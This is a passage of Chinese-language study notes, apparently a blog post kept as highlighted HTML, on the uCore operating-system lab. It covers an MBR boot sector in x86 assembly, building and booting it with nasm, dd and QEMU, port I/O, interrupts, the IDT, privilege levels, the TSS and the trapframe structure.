class="keyword">mov</span> <span class="built_in">ax</span>, message</span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">bp</span>, <span class="built_in">ax</span>    <span class="comment">; es:bp 为串首地址, es此时同cs一致，</span></span><br><span class="line">      <span class="comment">; 开头时已经为sreg初始化</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">; 光标位置要用到dx寄存器中内容,cx中的光标位置可忽略</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">cx</span>, <span class="number">5</span>   <span class="comment">; cx 为串长度,不包括结束符0的字符个数</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ax</span>, <span class="number">0x1301</span>  <span class="comment">; 子功能号13是显示字符及属性,要存入ah寄存器,</span></span><br><span class="line">      <span class="comment">; al设置写字符方式 ah=01: 显示字符串,光标跟随移动</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">bx</span>, <span class="number">0x2</span> <span class="comment">; bh存储要显示的页号,此处是第0页,</span></span><br><span class="line">      <span class="comment">; bl中是字符属性, 属性黑底绿字(bl = 02h)</span></span><br><span class="line">  <span class="keyword">int</span> <span class="number">0x10</span>    <span class="comment">; 执行BIOS 0x10 号中断</span></span><br><span class="line"><span class="comment">;;;;;;;;;      打字字符串结束 ;;;;;;;;;;;;;;;</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">jmp</span> $   <span class="comment">; 始终跳转到这条代码，为死循环，使程序悬停在此</span></span><br><span class="line"></span><br><span class="line">  message <span class="built_in">db</span> <span class="string">&quot;1 MBR&quot;</span></span><br><span class="line">  <span class="comment">; 用\0 将剩余空间填满</span></span><br><span class="line">  <span class="built_in">times</span> <span class="number">510</span>-($-$$) <span class="built_in">db</span> <span class="number">0</span> <span class="comment">; $指代当前指令的地址，$$指代当前section的首地址</span></span><br><span class="line">  <span class="comment">; 最后两位一定是0x55, 0xaa</span></span><br><span class="line">  <span class="built_in">db</span> <span class="number">0x55</span>,<span class="number">0xaa</span></span><br></pre></td></tr></table></figure></li><li><p>程序在section处使用了<code>vstart</code>伪指令。该指令只要求编译器将后面的所有数据与变量的地址以0x7c00开始编址，并不负责加载。而加载是由MBR加载器将该程序加载到0x7c00处。</p></li><li><p>执行以下代码，即可看到程序输出</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 编译汇编代码</span></span><br><span class="line">nasm mbr.asm -o mbr.bin</span><br><span class="line"><span class="comment"># 制作img镜像。注意dd指令的复制操作与cp不一样，它是针对磁盘来进行的复制</span></span><br><span class="line"><span class="comment">#   将编译出的mbr.bin写进mbr.img中的第0块</span></span><br><span class="line"><span class="built_in">dd</span> <span class="keyword">if</span>=mbr.bin of=mbr.img bs=512 count=1 conv=notrunc</span><br><span class="line"><span class="comment"># 使用i386架构启动mbr.img</span></span><br><span class="line">qemu-system-i386 mbr.img</span><br></pre></td></tr></table></figure><p><img src="/2020/08/uCore-1/1mbr.png" alt="img"></p></li></ul><h3 id="8-硬件访问">8. 硬件访问</h3><ul><li><p>硬件提供了软件方面的接口，操作系统通过软件（计算机指令）就能控制硬件。软件的逻辑需要作用在硬件上才能体现出来。</p></li><li><p>硬件在输出上大体分为串行和并行，相应的接口是串行接口和并行接口。</p></li><li><p>访问外部硬件的两种方式</p><ul><li>将某个外设的内存映射到一定范围内的地址空间。例如显卡。显卡是显示器的适配器，CPU 不直接和显示器交互，它只和显卡通信。其中的显存被映射到主机物理内存上的低端1MB的<code>0xB8000~0xBFFFF</code>。CPU往显存上写字节便是往屏幕上打印内容。显存地址分布如下<br><img src="/2020/08/uCore-1/ncardaddress.png" alt="img"></li><li>通过IO接口。CPU只访问IO接口，不关心另一边的外设。IO接口上也存在一些寄存器。<ul><li><p>CPU使用IO接口与外设通信。IO接口是连接CPU与外部设备的逻辑控制部件，可分为硬件软件两部分。</p></li><li><p>计算机与IO接口的通信是通过计算机指令来实现的。通过软件指令选择IO接口上的功能、工作模式的做法，称为“IO接口控制编程”，通常是用端口读写指令in/out实现。端口是IO接口开发给CPU的接口，一般的IO接口都有一组端口，每个端口都有自己的用途。<code>in/out</code>指令使用方式如下。</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">in</span> <span class="built_in">al</span>, <span class="built_in">dx</span>  # <span class="built_in">al</span>/<span class="built_in">ax</span> 用于存放从端口读入的数据，<span class="built_in">dx</span>指端口号</span><br><span class="line"><span class="keyword">in</span> <span class="built_in">ax</span>, <span class="built_in">dx</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">out</span> <span class="built_in">dx</span>, <span class="built_in">al</span></span><br><span class="line"><span class="keyword">out</span> <span class="built_in">dx</span>, <span class="built_in">ax</span></span><br><span class="line"><span class="keyword">out</span> 立即数, <span class="built_in">al</span></span><br><span class="line"><span class="keyword">out</span> 立即数, <span class="built_in">ax</span></span><br></pre></td></tr></table></figure></li></ul></li></ul></li><li><p>例子：直接向显卡中写入数据</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">;主引导程序</span></span><br><span class="line"><span class="comment">;------------------------------------------------------------</span></span><br><span class="line"><span class="meta">SECTION</span> MBR vstart=<span class="number">0x7c00</span> <span class="comment">; 起始地址编译为0x7c00</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ax</span>,<span class="built_in">cs</span>   <span class="comment">; 此时的cs为0，用0来初始化所有的段寄存器</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ds</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">es</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ss</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">fs</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">sp</span>,<span class="number">0x7c00</span> <span class="comment">; 0x7c00 以下空间暂时安全，故可用做栈。</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ax</span>,<span class="number">0xb800</span> <span class="comment">; 0xb800-0xbffff 用于文本模式显示适配器</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">gs</span>,<span class="built_in">ax</span></span><br><span class="line"></span><br><span class="line"><span class="comment">; 清屏 利用0x06号功能，上卷全部行，则可清屏。</span></span><br><span class="line"><span class="comment">; -----------------------------------------------------------</span></span><br><span class="line"><span class="comment">;INT 0x10   功能号:0x06   功能描述:上卷窗口</span></span><br><span class="line"><span class="comment">;------------------------------------------------------</span></span><br><span class="line"><span class="comment">;输入：</span></span><br><span class="line"><span class="comment">;AH 功能号= 0x06</span></span><br><span class="line"><span class="comment">;AL = 上卷的行数(如果为0,表示全部)</span></span><br><span class="line"><span class="comment">;BH = 上卷行属性</span></span><br><span class="line"><span class="comment">;(CL,CH) = 窗口左上角的(X,Y)位置</span></span><br><span class="line"><span class="comment">;(DL,DH) = 窗口右下角的(X,Y)位置</span></span><br><span class="line"><span class="comment">;无返回值：</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">ax</span>, <span class="number">0x600</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">bx</span>, <span class="number">0x700</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">cx</span>, <span class="number">0</span>          <span class="comment">; 左上角: (0, 0)</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">dx</span>, <span class="number">0x184f</span>     <span class="comment">; 右下角: (80,25),</span></span><br><span class="line">        <span class="comment">; VGA文本模式中,一行只能容纳80个字符,共25行。</span></span><br><span class="line">        <span class="comment">; 下标从0开始,所以0x18=24,0x4f=79</span></span><br><span class="line">  <span class="keyword">int</span>     <span class="number">0x10</span>            <span class="comment">; int 0x10</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">; 输出背景色绿色，前景色红色，并且跳动的字符串“1 MBR”</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x00</span>], <span class="string">&#x27;1&#x27;</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x01</span>], <span class="number">0xa4</span>   <span class="comment">; A表示绿色背景闪烁，4 表示前景色为红色</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x02</span>], <span class="string">&#x27; &#x27;</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x03</span>], <span class="number">0xa4</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x04</span>], <span class="string">&#x27;M&#x27;</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x05</span>], <span class="number">0xa4</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x06</span>], <span class="string">&#x27;B&#x27;</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x07</span>], <span class="number">0xa4</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x08</span>], <span class="string">&#x27;R&#x27;</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x09</span>], <span class="number">0xa4</span></span><br><span class="line">  <span class="keyword">jmp</span> $   <span class="comment">; 始终跳转到这条代码，为死循环，使程序悬停在此</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">; 用\0 将剩余空间填满</span></span><br><span class="line">  <span class="built_in">times</span> <span class="number">510</span>-($-$$) <span class="built_in">db</span> <span class="number">0</span></span><br><span class="line">  <span class="comment">; 最后两位一定是0x55, 0xaa</span></span><br><span class="line">  <span class="built_in">db</span> <span class="number">0x55</span>,<span class="number">0xaa</span></span><br></pre></td></tr></table></figure></li></ul><h3 id="9-中断与异常（重要）">9. 中断与异常（重要）</h3><ul><li>在操作系统中，有三种特殊的中断事件：<ul><li>异步中断(asynchronous interrupt)。这是由CPU外部设备引起的外部事件中断，例如I/O中断、时钟中断、控制台中断等。</li><li>同步中断(synchronous interrupt)。这是CPU执行指令期间检测到不正常的或非法的条件(如除零错、地址访问越界)所引起的内部事件。</li><li>陷入中断(trap interrupt)。这是在程序中使用请求系统服务的系统调用而引发的事件。</li></ul></li><li>当CPU收到中断或者异常的事件时，它会暂停执行当前的程序或任务，通过一定的机制跳转到负责处理这个信号的相关处理例程中，在完成对这个事件的处理后再跳回到刚才被打断的程序或任务中。</li><li>其中，中断向量和中断服务例程的对应关系主要是由IDT（中断描述符表）负责。操作系统在IDT中设置好各种中断向量对应的中断描述符，留待CPU在产生中断后查询对应中断服务例程的起始地址。而IDT本身的起始地址保存在<code>idtr</code>寄存器中。</li><li>当CPU进入中断处理例程时，<code>eflags</code>寄存器上的<code>IF</code>标志位将会自动被CPU置为0，待中断处理例程结束后才恢复<code>IF</code>标志。</li></ul><h4 id="a-中断描述符表">a. 中断描述符表</h4><ul><li>中断描述符表（Interrupt Descriptor Table, IDT）把每个中断或异常编号和一个指向中断服务例程的描述符联系起来。同GDT一样，IDT是一个8字节的描述符数组，但IDT的第一项可以包含一个描述符。</li><li>IDT可以位于内存的任意位置，CPU通过IDT寄存器（IDTR）的内容来寻址IDT的起始地址。</li></ul><h4 id="b-IDT-gate-descriptors">b. IDT gate descriptors</h4><ul><li><p>中断/异常应该使用<code>Interrupt Gate</code>或<code>Trap Gate</code>。其中的唯一区别就是：当调用<code>Interrupt Gate</code>时，Interrupt会被CPU自动禁止；而调用<code>Trap Gate</code>时，CPU则不会去禁止或打开中断，而是保留原样。</p><blockquote><p>这其中的原理是当CPU跳转至<code>Interrupt Gate</code>时，其eflag上的IF位会被清除。而<code>Trap Gate</code>则不改变。</p></blockquote></li><li><p>IDT中包含了3种类型的Descriptor</p><ul><li>Task-gate descriptor</li><li>Interrupt-gate descriptor （中断方式用到）</li><li>Trap-gate descriptor（系统调用用到）<br>下图图显示了80386的中断门描述符、陷阱门描述符的格式：<br><img src="/2020/08/uCore-1/gate.png" alt="img"></li></ul></li></ul><h4 id="c-中断处理过程">c. 中断处理过程</h4><h5 id="1-起始阶段">1) 起始阶段</h5><ul><li>CPU执行完每条指令后，判断中断控制器中是否产生中断。如果存在中断，则取出对应的中断变量。</li><li>CPU根据中断变量，到IDT中找到对应的中断描述符。</li><li>通过获取到的中断描述符中的段选择子，从GDT中取出对应的段描述符。此时便获取到了中断服务例程的段基址与属性信息，跳转至该地址。</li><li>CPU会根据CPL和中断服务例程的段描述符的DPL信息确认是否发生了特权级的转换。若发生了特权级的转换，这时CPU会从当前程序的TSS信息（该信息在内存中的起始地址存在TR寄存器中）里取得该程序的内核栈地址，即包括内核态的ss和esp的值，并立即将系统当前使用的栈切换成新的内核栈。这个栈就是即将运行的中断服务程序要使用的栈。紧接着就将当前程序使用的用户态的ss和esp压到新的内核栈中保存起来；</li><li>CPU需要<strong>开始保存当前被打断的程序的现场</strong>（即一些寄存器的值），以便于将来恢复被打断的程序继续执行。这需要利用内核栈来保存相关现场信息，即依次压入当前被打断程序使用的eflags，cs，eip，errorCode（如果是有错误码的异常）信息；</li><li>CPU利用中断服务例程的段描述符将其第一条指令的地址加载到cs和eip寄存器中，<strong>开始执行中断服务例程</strong>。这意味着先前的程序被暂停执行，中断服务程序正式开始工作。</li></ul><h5 id="2-终止阶段">2) 终止阶段</h5><ul><li>每个中断服务例程在有中断处理工作完成后需要通过<code>iret</code>（或<code>iretd</code>）指令恢复被打断的程序的执行。CPU执行IRET指令的具体过程如下：<ul><li>程序执行这条iret指令时，首先会从内核栈里弹出先前保存的被打断的程序的现场信息，即eflags，cs，eip重新开始执行；</li><li>如果存在特权级转换（从内核态转换到用户态），则还需要从内核栈中弹出用户态栈的ss和esp，即栈也被切换回原先使用的用户栈。</li><li>如果此次处理的是带有错误码（errorCode）的异常，CPU在恢复先前程序的现场时，并不会弹出errorCode，需要要求相关的中断服务例程在调用iret返回之前添加出栈代码主动弹出errorCode。</li></ul></li></ul><h3 id="10-特权级">10. 特权级</h3><blockquote><p>尽管特权级相关的内容在Lab2课程中提及，但由于Lab1中的Challenge会涉及到特权级的改变，故将该部分的内容迁移至此处。</p></blockquote><ul><li>特权级共分为四档，分别为0-3，其中<code>Kernel</code>为第0特权级（ring 0），用户程序为第3特权级（ring 3），操作系统保护分别为第1和第2特权级。</li><li>特权级的区别<ul><li>一些指令（例如特权指令<code>lgdt</code>）只能运行在ring 0下。</li><li>CPU在如下时刻会检查特权级<ul><li>访问数据段</li><li>访问页</li><li>进入中断服务例程（ISRs）</li><li>…</li></ul></li><li>如果检查失败，则会产生<strong>保护异常（General Protection Fault）</strong>.</li></ul></li></ul><h4 id="1-CPL、DPL、RPL与IOPL">1. CPL、DPL、RPL与IOPL</h4><ul><li><p><strong>DPL存储于段描述符中</strong>，规定<strong>访问该段的权限级别</strong>(Descriptor Privilege Level)，每个段的DPL固定。<br>当进程访问一个段时，需要进程特权级检查。</p></li><li><p><strong>CPL</strong>存在于CS寄存器的低两位，<strong>即CPL是CS段描述符的DPL</strong>，是当前代码的权限级别(Current Privilege Level)。</p></li><li><p><strong>RPL存在于段选择子中</strong>，说明的是<strong>进程对段访问的请求权限</strong>(Request Privilege Level)，是对于<strong>段选择子</strong>而言的，每个段选择子有自己的RPL。而且RPL对每个段来说不是固定的，两次访问同一段时的RPL可以不同。RPL可能会削弱CPL的作用，例如当前CPL=0的进程要访问一个数据段，它把段选择符中的RPL设为3，这样虽然它对该段仍然只有特权为3的访问权限。</p></li><li><p>IOPL(I/O Privilege Level)即I/O特权标志，位于<strong>eflag寄存器</strong>中，用两位二进制位来表示，也称为I/O特权级字段。该字段指定了要求执行I/O指令的特权级。如 果当前的特权级别在数值上小于等于IOPL的值，那么，该I/O指令可执行，否则将发生一个保护异常。</p><blockquote><p>只有当CPL=0时，可以改变IOPL的值，当CPL&lt;=IOPL时，可以改变IF标志位。</p></blockquote></li></ul><h4 id="2-特权级检查">2. 特权级检查</h4><blockquote><p>在下述的特权级比较中，需要注意特权级越低，其ring值越大。</p></blockquote><ul><li><p>访问门时（中断、陷入、异常），要求<strong>DPL[段] &lt;= CPL &lt;= DPL[门]</strong></p><blockquote><p>访问门的代码权限<strong>比门的特权级要高</strong>，因为这样才能访问门。</p><p>但访问门的代码权限<strong>比被访问的段的权限要低</strong>，因为通过门的目的是<strong>访问特权级更高的段</strong>，这样就可以达到<strong>低权限应用程序使用高权限内核服务</strong>的目的。</p></blockquote></li><li><p>访问段时，要求<strong>DPL[段] &gt;= max {CPL, RPL}</strong></p><blockquote><p>只能使用最低的权限来访问段数据。</p></blockquote></li></ul><h4 id="3-通过中断切换特权级">3. 通过中断切换特权级</h4><h5 id="1-TSS">1) TSS</h5><ul><li><p><strong>TSS(Task State Segment)</strong> 是操作系统在进行进程切换时保存进程现场信息的段，其结构如下<br><img src="/2020/08/uCore-1/tss.png" alt="img"></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* task state segment format (as described by the Pentium architecture book) */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">taskstate</span> &#123;</span><br><span class="line">    <span class="type">uint32_t</span> ts_link;        <span class="comment">// old ts selector</span></span><br><span class="line">    <span class="type">uintptr_t</span> ts_esp0;        <span class="comment">// stack pointers and segment selectors</span></span><br><span class="line">    <span class="type">uint16_t</span> ts_ss0;        <span class="comment">// after an increase in privilege level</span></span><br><span class="line">    <span class="type">uint16_t</span> ts_padding1;</span><br><span class="line">    <span class="type">uintptr_t</span> ts_esp1;</span><br><span class="line">    <span class="type">uint16_t</span> ts_ss1;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding2;</span><br><span class="line">    <span class="type">uintptr_t</span> ts_esp2;</span><br><span class="line">    <span class="type">uint16_t</span> ts_ss2;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding3;</span><br><span class="line">    <span class="type">uintptr_t</span> ts_cr3;        <span class="comment">// page directory base</span></span><br><span class="line">    <span class="type">uintptr_t</span> ts_eip;        <span class="comment">// saved state from last task switch</span></span><br><span class="line">    <span class="type">uint32_t</span> ts_eflags;</span><br><span class="line">    <span class="type">uint32_t</span> ts_eax;        <span class="comment">// more saved state (registers)</span></span><br><span class="line">    <span class="type">uint32_t</span> ts_ecx;</span><br><span class="line">    <span class="type">uint32_t</span> ts_edx;</span><br><span class="line">    <span class="type">uint32_t</span> ts_ebx;</span><br><span class="line">    <span class="type">uintptr_t</span> ts_esp;</span><br><span class="line">    <span class="type">uintptr_t</span> ts_ebp;</span><br><span class="line">    <span class="type">uint32_t</span> ts_esi;</span><br><span class="line">    <span class="type">uint32_t</span> ts_edi;</span><br><span class="line">    <span class="type">uint16_t</span> ts_es;            <span class="comment">// even more saved state (segment selectors)</span></span><br><span class="line">    <span class="type">uint16_t</span> ts_padding4;</span><br><span class="line">    <span class="type">uint16_t</span> ts_cs;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding5;</span><br><span class="line">    <span class="type">uint16_t</span> ts_ss;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding6;</span><br><span class="line">    <span class="type">uint16_t</span> ts_ds;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding7;</span><br><span class="line">    <span class="type">uint16_t</span> ts_fs;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding8;</span><br><span class="line">    <span class="type">uint16_t</span> ts_gs;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding9;</span><br><span class="line">    <span class="type">uint16_t</span> ts_ldt;</span><br><span class="line">    <span class="type">uint16_t</span> ts_padding10;</span><br><span class="line">    <span class="type">uint16_t</span> <span class="type">ts_t</span>;            <span class="comment">// trap on task switch</span></span><br><span class="line">    <span class="type">uint16_t</span> ts_iomb;        <span class="comment">// i/o map base address</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><ul><li><p>这里暂时只说明<strong>特权级切换相关</strong>的项。其中，TSS中分别保留了ring0、ring1、ring2的栈(<code>ss</code>、<code>esp</code>寄存器值)。当用户程序从ring3跳至ring0时(例如执行中断)，此时的栈就会从用户栈切换到内核栈。切换栈的操作从开始中断的那一瞬间（例如：从<code>int 0x78</code>到中断处理例程之间）就已完成。</p><blockquote><p>切换栈的操作为修改<code>esp</code>和<code>ss</code>寄存器。</p></blockquote></li><li><p>TSS段的段描述符保存在GDT中，其<code>ring0</code>的栈会在初始化GDT时被一起设置。<code>TR</code>寄存器会保存当前TSS的段描述符，以提高索引速度。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">segdesc</span> gdt[] = &#123;</span><br><span class="line">    SEG_NULL,</span><br><span class="line">    [SEG_KTEXT] = <span class="built_in">SEG</span>(STA_X | STA_R, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_KERNEL),</span><br><span class="line">    [SEG_KDATA] = <span class="built_in">SEG</span>(STA_W, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_KERNEL),</span><br><span class="line">    [SEG_UTEXT] = <span class="built_in">SEG</span>(STA_X | STA_R, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_USER),</span><br><span class="line">    [SEG_UDATA] = <span class="built_in">SEG</span>(STA_W, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_USER),</span><br><span class="line">    [SEG_TSS]   = SEG_NULL,</span><br><span class="line">&#125;;</span><br><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">pseudodesc</span> gdt_pd = &#123;</span><br><span class="line">      <span class="built_in">sizeof</span>(gdt) - <span class="number">1</span>, (<span class="type">uintptr_t</span>)gdt</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* gdt_init - initialize the default GDT and TSS */</span></span><br><span class="line">  <span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function">  <span class="title">gdt_init</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 设置TSS的ring0栈地址，包括esp寄存器和SS段寄存器</span></span><br><span class="line">      <span class="built_in">load_esp0</span>((<span class="type">uintptr_t</span>)bootstacktop);</span><br><span class="line">      ts.ts_ss0 = KERNEL_DS;</span><br><span class="line"></span><br><span class="line">      <span class="comment">// 将TSS写入GDT中</span></span><br><span class="line">      gdt[SEG_TSS] = <span class="built_in">SEGTSS</span>(STS_T32A, (<span class="type">uintptr_t</span>)&amp;ts, <span class="built_in">sizeof</span>(ts), DPL_KERNEL);</span><br><span class="line"></span><br><span class="line">      <span class="comment">// 加载GDT至GDTR寄存器</span></span><br><span class="line">      <span class="built_in">lgdt</span>(&amp;gdt_pd);</span><br><span class="line"></span><br><span class="line">      <span class="comment">// 加载TSS至TR寄存器</span></span><br><span class="line">      <span class="built_in">ltr</span>(GD_TSS);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul><h5 id="2-trapFrame">2) trapFrame</h5><ul><li><p><code>trapframe</code>结构是进入中断门所必须的结构，其结构如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">trapframe</span> &#123;</span><br><span class="line">    <span class="comment">// tf_regs保存了基本寄存器的值，包括eax,ebx,esi,edi寄存器等等</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pushregs</span> tf_regs;</span><br><span class="line">    <span class="type">uint16_t</span> tf_gs;</span><br><span class="line">    <span class="type">uint16_t</span> tf_padding0;</span><br><span class="line">    <span class="type">uint16_t</span> tf_fs;</span><br><span class="line">    <span class="type">uint16_t</span> tf_padding1;</span><br><span class="line">    <span class="type">uint16_t</span> tf_es;</span><br><span class="line">    <span class="type">uint16_t</span> tf_padding2;</span><br><span class="line">    <span class="type">uint16_t</span> tf_ds;</span><br><span class="line">    <span class="type">uint16_t</span> tf_padding3;</span><br><span class="line">    <span class="type">uint32_t</span> tf_trapno;</span><br><span class="line">    <span class="comment">// 以下这些信息会被CPU硬件自动压入切换后的栈。包括下面切换特权级所使用的esp、ss等数据</span></span><br><span class="line">    <span class="type">uint32_t</span> tf_err;</span><br><span class="line">    <span class="type">uintptr_t</span> tf_eip;</span><br><span class="line">    <span class="type">uint16_t</span> tf_cs;</span><br><span class="line">    <span class="type">uint16_t</span> tf_padding4;</span><br><span class="line">    <span class="type">uint32_t</span> tf_eflags;</span><br><span class="line">    <span class="comment">// 以下这些信息会在切换特权级时被使用</span></span><br><span class="line">    <span class="type">uintptr_t</span> tf_esp;</span><br><span class="line">    <span class="type">uint16_t</span> tf_ss;</span><br><span class="line">    <span class="type">uint16_t</span> tf_padding5;</span><br><span class="line">&#125; __attribute__((packed));</span><br></pre></td></tr></table></figure></li></ul><h5 id="3-中断处理例程的入口代码">3) 中断处理例程的入口代码</h5><ul><li><p>中断处理例程的入口代码用于保存上下文并构建一个<code>trapframe</code>，其源代码如下：</p>  <figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span 